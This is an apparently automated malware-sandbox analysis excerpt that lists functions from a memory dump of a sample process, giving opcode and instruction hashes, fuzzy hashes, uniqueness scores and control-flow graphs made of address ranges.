                                    • Opcode Fuzzy Hash: 4e9a79426aa8acfcf2cf8cd029f79838a68489f7140bd22601f2240177354a7c
                                    • Instruction Fuzzy Hash: DAC1B474E00218CFDB54DFA5D994BADBBB2BF89300F2084AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 240c9384179ed6bfe26ace7f327f918e1a6040b32023ac346df40d8f47a4fa71
                                    • Instruction ID: 1bc7966053bc0d928b3406265415a8707e530b0b8dcf36decec7bcf539fd96cb
                                    • Opcode Fuzzy Hash: 240c9384179ed6bfe26ace7f327f918e1a6040b32023ac346df40d8f47a4fa71
                                    • Instruction Fuzzy Hash: D6C1B474E00218CFDB14DFA5D994BADBBB2BF88300F2084AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1162 3f0040-3f0060 1163 3f0067-3f012a LdrInitializeThunk 1162->1163 1164 3f0062 1162->1164 1170 3f0442-3f0474 1163->1170 1171 3f0130-3f0147 1163->1171 1164->1163 1174 3f014e-3f0157 1171->1174 1175 3f0149 1171->1175 1176 3f0435-3f043b 1174->1176 1175->1174 1177 3f015c-3f01d2 1176->1177 1178 3f0441 1176->1178 1183 3f028e-3f02e8 1177->1183 1184 3f01d8-3f0246 1177->1184 1178->1170 1195 3f02e9-3f0337 1183->1195 1193 3f0289-3f028c 1184->1193 1194 3f0248-3f0288 1184->1194 1193->1195 1194->1193 1200 3f033d-3f041f 1195->1200 1201 3f0420-3f042b 1195->1201 1200->1201 1202 3f042d 1201->1202 1203 3f0432 1201->1203 1202->1203 1203->1176
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 6f63e4ecc5c4f70d3e04d23ca32104b7953a0888f5d146e780c941a80e6058a1
                                    • Instruction ID: 2bf0a70b70efc7725b62978bdd9b714fe4f497d8060e9b545e75e9edc72144ac
                                    • Opcode Fuzzy Hash: 6f63e4ecc5c4f70d3e04d23ca32104b7953a0888f5d146e780c941a80e6058a1
                                    • Instruction Fuzzy Hash: 13C1B474E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D909AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 455caffe7d1e44fbe8d227fd503a22a782ca38eecedf6061f0a724bd1f43863c
                                    • Instruction ID: b7ad12606ab065741a224383cf6dcc99b7dd01c07946a08190e21f39321ddcc5
                                    • Opcode Fuzzy Hash: 455caffe7d1e44fbe8d227fd503a22a782ca38eecedf6061f0a724bd1f43863c
                                    • Instruction Fuzzy Hash: C9C1A274E00218CFDB54DFA5D995BADBBB2BF88300F2084A9D809AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1702 3f2bb0-3f2bd0 1703 3f2bd7-3f2c84 LdrInitializeThunk 1702->1703 1704 3f2bd2 1702->1704 1709 3f2c8c-3f2c9a 1703->1709 1704->1703 1710 3f2fb2-3f2fe4 1709->1710 1711 3f2ca0-3f2cb7 1709->1711 1714 3f2cbe-3f2cc7 1711->1714 1715 3f2cb9 1711->1715 1716 3f2fa5-3f2fab 1714->1716 1715->1714 1717 3f2ccc-3f2d42 1716->1717 1718 3f2fb1 1716->1718 1723 3f2dfe-3f2e58 1717->1723 1724 3f2d48-3f2db6 1717->1724 1718->1710 1735 3f2e59-3f2ea7 1723->1735 1733 3f2df9-3f2dfc 1724->1733 1734 3f2db8-3f2df8 1724->1734 1733->1735 1734->1733 1740 3f2ead-3f2f8f 1735->1740 1741 3f2f90-3f2f9b 1735->1741 1740->1741 1742 3f2f9d 1741->1742 1743 3f2fa2 1741->1743 1742->1743 1743->1716
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 67dc8858ca9e26205cc1536c87ec5a1f24d2d13394be881568b5f48917af16e2
                                    • Instruction ID: cfb1069ac6f5440883f9e2edf34ee73f72194faff503887a1ef8be83a7b31e42
                                    • Opcode Fuzzy Hash: 67dc8858ca9e26205cc1536c87ec5a1f24d2d13394be881568b5f48917af16e2
                                    • Instruction Fuzzy Hash: D3C1B374E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D809AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: a5efae3d3a65893e52b909dee1521bb5c054da9c62b41a98322570dccb3f2b11
                                    • Instruction ID: f4db746b5e193e804bae127140d81903e26a510642b1b7c72ae74aecffc99c2e
                                    • Opcode Fuzzy Hash: a5efae3d3a65893e52b909dee1521bb5c054da9c62b41a98322570dccb3f2b11
                                    • Instruction Fuzzy Hash: B2C1B274E00218CFDB54DFA5D994BADBBB2BF88300F2084AAD509AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 99b864c37c63ee7b29aa5c92052c49c9ac8680eccc550cf3f75048f55f7a91b7
                                    • Instruction ID: 41f0ce3799cb8a84c58f6db124235b41635bc6bbfe1a9bd4a779e00e72b3af90
                                    • Opcode Fuzzy Hash: 99b864c37c63ee7b29aa5c92052c49c9ac8680eccc550cf3f75048f55f7a91b7
                                    • Instruction Fuzzy Hash: 0DC1B374E00218CFDB54DFA5D994BADBBB2BF88300F2084AAD509AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1540 3f1ea8-3f1ec8 1541 3f1ecf-3f1f7c LdrInitializeThunk 1540->1541 1542 3f1eca 1540->1542 1547 3f1f84-3f1f92 1541->1547 1542->1541 1548 3f22aa-3f22dc 1547->1548 1549 3f1f98-3f1faf 1547->1549 1552 3f1fb6-3f1fbf 1549->1552 1553 3f1fb1 1549->1553 1554 3f229d-3f22a3 1552->1554 1553->1552 1555 3f22a9 1554->1555 1556 3f1fc4-3f203a 1554->1556 1555->1548 1561 3f20f6-3f2150 1556->1561 1562 3f2040-3f20ae 1556->1562 1573 3f2151-3f219f 1561->1573 1571 3f20f1-3f20f4 1562->1571 1572 3f20b0-3f20f0 1562->1572 1571->1573 1572->1571 1578 3f2288-3f2293 1573->1578 1579 3f21a5-3f2287 1573->1579 1581 3f229a 1578->1581 1582 3f2295 1578->1582 1579->1578 1581->1554 1582->1581
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 6eb4dc5fd64d1a14c8077729521c3e647096552e2c2e6533a81d5bdc0a939bbd
                                    • Instruction ID: 06ae3483ed6179cd8b9111eaa0f7e498b0da44d6a044cb09231c7929aae343e3
                                    • Opcode Fuzzy Hash: 6eb4dc5fd64d1a14c8077729521c3e647096552e2c2e6533a81d5bdc0a939bbd
                                    • Instruction Fuzzy Hash: E0C1C374E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D809AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1378 3f11a0-3f11c0 1379 3f11c7-3f1274 LdrInitializeThunk 1378->1379 1380 3f11c2 1378->1380 1385 3f127c-3f128a 1379->1385 1380->1379 1386 3f15a2-3f15d4 1385->1386 1387 3f1290-3f12a7 1385->1387 1390 3f12ae-3f12b7 1387->1390 1391 3f12a9 1387->1391 1392 3f1595-3f159b 1390->1392 1391->1390 1393 3f12bc-3f1332 1392->1393 1394 3f15a1 1392->1394 1399 3f13ee-3f1448 1393->1399 1400 3f1338-3f13a6 1393->1400 1394->1386 1411 3f1449-3f1497 1399->1411 1409 3f13e9-3f13ec 1400->1409 1410 3f13a8-3f13e8 1400->1410 1409->1411 1410->1409 1416 3f149d-3f157f 1411->1416 1417 3f1580-3f158b 1411->1417 1416->1417 1419 3f158d 1417->1419 1420 3f1592 1417->1420 1419->1420 1420->1392
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: d40759560f58ba6630ce5e9021f071b61df24e251ea9121ee57d4e2a0ade487b
                                    • Instruction ID: 16589925c8c4c5e5994fc882ce972fc60a87b0dbc14e5561a07ffcb0be6a63e7
                                    • Opcode Fuzzy Hash: d40759560f58ba6630ce5e9021f071b61df24e251ea9121ee57d4e2a0ade487b
                                    • Instruction Fuzzy Hash: 97C1B474E00218CFDB54DFA5D994BADBBB2BF89300F2084AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1216 3f0498-3f04b8 1217 3f04bf-3f056c LdrInitializeThunk 1216->1217 1218 3f04ba 1216->1218 1223 3f0574-3f0582 1217->1223 1218->1217 1224 3f089a-3f08cc 1223->1224 1225 3f0588-3f059f 1223->1225 1228 3f05a6-3f05af 1225->1228 1229 3f05a1 1225->1229 1230 3f088d-3f0893 1228->1230 1229->1228 1231 3f0899 1230->1231 1232 3f05b4-3f062a 1230->1232 1231->1224 1237 3f06e6-3f0740 1232->1237 1238 3f0630-3f069e 1232->1238 1249 3f0741-3f078f 1237->1249 1247 3f06e1-3f06e4 1238->1247 1248 3f06a0-3f06e0 1238->1248 1247->1249 1248->1247 1254 3f0878-3f0883 1249->1254 1255 3f0795-3f0877 1249->1255 1256 3f088a 1254->1256 1257 3f0885 1254->1257 1255->1254 1256->1230 1257->1256
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 6abed2ded2d686c710425ec759297eb4e8a15cf23f17b089c4c2e3fbdc3b3afd
                                    • Instruction ID: 6c496bd69715a8f1c8367506ddb4dd01081c9436e9103a653bab4b1c64230712
                                    • Opcode Fuzzy Hash: 6abed2ded2d686c710425ec759297eb4e8a15cf23f17b089c4c2e3fbdc3b3afd
                                    • Instruction Fuzzy Hash: DAC1B274E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D809AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: b5e23e5cc040501a4fa84e52a2d9bf00ac64b86e4becd478acc48d40523c9e52
                                    • Instruction ID: 84bd5a040852a2ef5d353e88b03b9bf50988bdb9f8da9d7ee7fe54648f00ca89
                                    • Opcode Fuzzy Hash: b5e23e5cc040501a4fa84e52a2d9bf00ac64b86e4becd478acc48d40523c9e52
                                    • Instruction Fuzzy Hash: 10C1B374E00218CFDB54DFA5D994BADBBB2BF88300F2085AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 12ea889f89faa357be8c068a1676e3592b99ffb16e0d9275bd561442b8384f97
                                    • Instruction ID: 3c79c502443005862be08c5d1cc52087b9da0cf9c5d3dd28b308b000b0fc7918
                                    • Opcode Fuzzy Hash: 12ea889f89faa357be8c068a1676e3592b99ffb16e0d9275bd561442b8384f97
                                    • Instruction Fuzzy Hash: 92C1B474E00218CFDB54DFA5D994BADBBB2BF88300F2085A9D809AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1432 3f15f8-3f1618 1433 3f161f-3f16cc LdrInitializeThunk 1432->1433 1434 3f161a 1432->1434 1439 3f16d4-3f16e2 1433->1439 1434->1433 1440 3f19fa-3f1a2c 1439->1440 1441 3f16e8-3f16ff 1439->1441 1444 3f1706-3f170f 1441->1444 1445 3f1701 1441->1445 1446 3f19ed-3f19f3 1444->1446 1445->1444 1447 3f19f9 1446->1447 1448 3f1714-3f178a 1446->1448 1447->1440 1453 3f1846-3f18a0 1448->1453 1454 3f1790-3f17fe 1448->1454 1465 3f18a1-3f18ef 1453->1465 1463 3f1841-3f1844 1454->1463 1464 3f1800-3f1840 1454->1464 1463->1465 1464->1463 1470 3f19d8-3f19e3 1465->1470 1471 3f18f5-3f19d7 1465->1471 1473 3f19ea 1470->1473 1474 3f19e5 1470->1474 1471->1470 1473->1446 1474->1473
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: af9af3fb7fc40cc6a6b654fc7e0570a9bc35f73ebada92574bfeadcec959352b
                                    • Instruction ID: d25807e6403cee2497be2acc591488a80f540a46dddf2f806dcec1c163d370d7
                                    • Opcode Fuzzy Hash: af9af3fb7fc40cc6a6b654fc7e0570a9bc35f73ebada92574bfeadcec959352b
                                    • Instruction Fuzzy Hash: 4FC1B474E00218CFDB54DFA5D994BADBBB2BF88300F2085AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1270 3f08f0-3f0910 1271 3f0917-3f09c4 LdrInitializeThunk 1270->1271 1272 3f0912 1270->1272 1277 3f09cc-3f09da 1271->1277 1272->1271 1278 3f0cf2-3f0d24 1277->1278 1279 3f09e0-3f09f7 1277->1279 1282 3f09fe-3f0a07 1279->1282 1283 3f09f9 1279->1283 1284 3f0ce5-3f0ceb 1282->1284 1283->1282 1285 3f0a0c-3f0a82 1284->1285 1286 3f0cf1 1284->1286 1291 3f0b3e-3f0b98 1285->1291 1292 3f0a88-3f0af6 1285->1292 1286->1278 1303 3f0b99-3f0be7 1291->1303 1301 3f0b39-3f0b3c 1292->1301 1302 3f0af8-3f0b38 1292->1302 1301->1303 1302->1301 1308 3f0bed-3f0ccf 1303->1308 1309 3f0cd0-3f0cdb 1303->1309 1308->1309 1311 3f0cdd 1309->1311 1312 3f0ce2 1309->1312 1311->1312 1312->1284
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: a6c710bf6699025040cfb1813d734cad0385dfe20c94a45606b6fe0832ae9ac5
                                    • Instruction ID: 72e421fc3733abf3dd6c55f31b120159cb4ed856c7972b38abbddf4c99404a84
                                    • Opcode Fuzzy Hash: a6c710bf6699025040cfb1813d734cad0385dfe20c94a45606b6fe0832ae9ac5
                                    • Instruction Fuzzy Hash: A4C1B274E00218CFDB54DFA5D994BADBBB2BF88300F2085A9D809AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 4c28e9d57023b990df44c74c8edd482bc301f64c2d74ab4af0b075ad30f5b401
                                    • Instruction ID: 0c37ca5aa800c80727b9a4d51fdf29207d4ef7d1fbfe2b0c9273120c0f14a47d
                                    • Opcode Fuzzy Hash: 4c28e9d57023b990df44c74c8edd482bc301f64c2d74ab4af0b075ad30f5b401
                                    • Instruction Fuzzy Hash: 8FC1C474E00218CFDB14DFA5D994BADBBB2BF88300F2084A9D509AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 8b4de3c59d4887eb62ced76c5fc3230d6ca3cb3ee0cf9ac1ae3dc4d60b365266
                                    • Instruction ID: 1c10ee257e38a684f91734e7d0aa54857e39f6985bb37618f7415238b7ce926b
                                    • Opcode Fuzzy Hash: 8b4de3c59d4887eb62ced76c5fc3230d6ca3cb3ee0cf9ac1ae3dc4d60b365266
                                    • Instruction Fuzzy Hash: C4C1B374E00218CFDB54DFA5D994BADBBB2BF88300F2085A9D809AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 6b1cce7cc02162154e1f16e3a5242f086b32d9e5c034be2f5920a9a782b14c9f
                                    • Instruction ID: 87a5c94ddea0ce94332276f9e5b2d595bcafe4bd3b3f80c8a0eb99da86a54e49
                                    • Opcode Fuzzy Hash: 6b1cce7cc02162154e1f16e3a5242f086b32d9e5c034be2f5920a9a782b14c9f
                                    • Instruction Fuzzy Hash: 0CC1B574E00218CFDB54DFA5D994BADBBB2BF88300F1084AAD409AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 27b72336cb4e08dce76f33ad030d271a6614fe4f9f9e3f6ceda9ab9769931380
                                    • Instruction ID: 6101e8e6f97e73a9528000d66e36b28dbd4d3bf6fcef3e790be7e37040606e5d
                                    • Opcode Fuzzy Hash: 27b72336cb4e08dce76f33ad030d271a6614fe4f9f9e3f6ceda9ab9769931380
                                    • Instruction Fuzzy Hash: 7AC1C474E00218CFDB14DFA5D994BAEBBB2BF88300F2085A9D509AB365DB355E85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 9ec18ae8d58252405c33c2f4159b8ea5fabf31990bc864d9f2b1a025276034a8
                                    • Instruction ID: d2aeeb2b0d716b49727394cde1d4bebc16dbea9a23fde67164431fbe89ddb114
                                    • Opcode Fuzzy Hash: 9ec18ae8d58252405c33c2f4159b8ea5fabf31990bc864d9f2b1a025276034a8
                                    • Instruction Fuzzy Hash: 50410470D00248CFDB19DFAAD8956AEFBB2AF89300F24C12AD414BB265DB345946CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 5ad731778347ee9323b7e8f73a80685b2075c314bbd7f9a10b728462b27da97c
                                    • Instruction ID: 098c8579f9a2041fd7c3257b33bbff0a69f7422bc9452ac9765fa56939402a03
                                    • Opcode Fuzzy Hash: 5ad731778347ee9323b7e8f73a80685b2075c314bbd7f9a10b728462b27da97c
                                    • Instruction Fuzzy Hash: 9B41F470D00248CFDB19DFAAD8956EEBBB2AF89300F24C52AD515BB265DB345946CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 6c3a282af7de56822b1773ded2b345b2b918a8ca0b02c87c15a57efff647894c
                                    • Instruction ID: cb3d690d92c7443100c6205cd5c22fb7cb3d981df89b14e2976f2470bc82ea41
                                    • Opcode Fuzzy Hash: 6c3a282af7de56822b1773ded2b345b2b918a8ca0b02c87c15a57efff647894c
                                    • Instruction Fuzzy Hash: 9341D274D012088FDB19DFAAD8957EEBBF2AF99300F20812AD459BB255EB345946CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 9d3e0742dc1b455d3f475783b26f6d0993fea49fddd93867ca654cf478bc9ac7
                                    • Instruction ID: d39de4356154082cfeb5776ff2fb61ccd0ab1ce6f51aeb2f0023c814c59885ad
                                    • Opcode Fuzzy Hash: 9d3e0742dc1b455d3f475783b26f6d0993fea49fddd93867ca654cf478bc9ac7
                                    • Instruction Fuzzy Hash: 5B412574D00248CFEB18CFAAC8556EEBBF2AF89300F24C12AD519BB265DB345906CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 1622cda81f20efcaf44f392b645d9b62cb3b823551ead486db6620d137995f96
                                    • Instruction ID: 9e9a768058f3b4b091a71083a6de1804cf5dc1dc4ba073b7e0258cb58c2b66ce
                                    • Opcode Fuzzy Hash: 1622cda81f20efcaf44f392b645d9b62cb3b823551ead486db6620d137995f96
                                    • Instruction Fuzzy Hash: 9D41E574D042488FDB19DFA6D9556EEBBB2AF89300F24C12AD415AB265DB345906CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: d332957b9332b2e4e819f0fed1cb73bf0a27d3e05c5fb8643976a3fc5d9bff90
                                    • Instruction ID: f41cbdb04330a3e0229399e925582371ac24688022b9238551962497ce1b2d86
                                    • Opcode Fuzzy Hash: d332957b9332b2e4e819f0fed1cb73bf0a27d3e05c5fb8643976a3fc5d9bff90
                                    • Instruction Fuzzy Hash: A4411470E012488FDB18DFAAD8556EEFBF2AF89300F20D12AD519BB265DB345906CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 1f935e7e4a0d94ad0b444798408a3ad7faf46ce010261f3a067b98bfae8034c5
                                    • Instruction ID: 08702d7d248f21f2a3978806dccc6aeb6d8b01a8383b192ac82c9cefbdd5e610
                                    • Opcode Fuzzy Hash: 1f935e7e4a0d94ad0b444798408a3ad7faf46ce010261f3a067b98bfae8034c5
                                    • Instruction Fuzzy Hash: ED41E370D016488FDB19DFAAD9956EEFBF2AF88300F24C12AD419AB255DB345946CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: a82d92ad5756cb5a34f7a53b84f3b601ce79c9720a3be21a8a22fd0cbedca1b2
                                    • Instruction ID: 9bdb9d9beb27a51dbb3f3c47a08fd7a76d94b3e0e9bcebc9081a853663d352a0
                                    • Opcode Fuzzy Hash: a82d92ad5756cb5a34f7a53b84f3b601ce79c9720a3be21a8a22fd0cbedca1b2
                                    • Instruction Fuzzy Hash: F5412374D00248CFEB19DFAAD8516EEBBF2AF89300F20D12AD519BB265DB345906CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

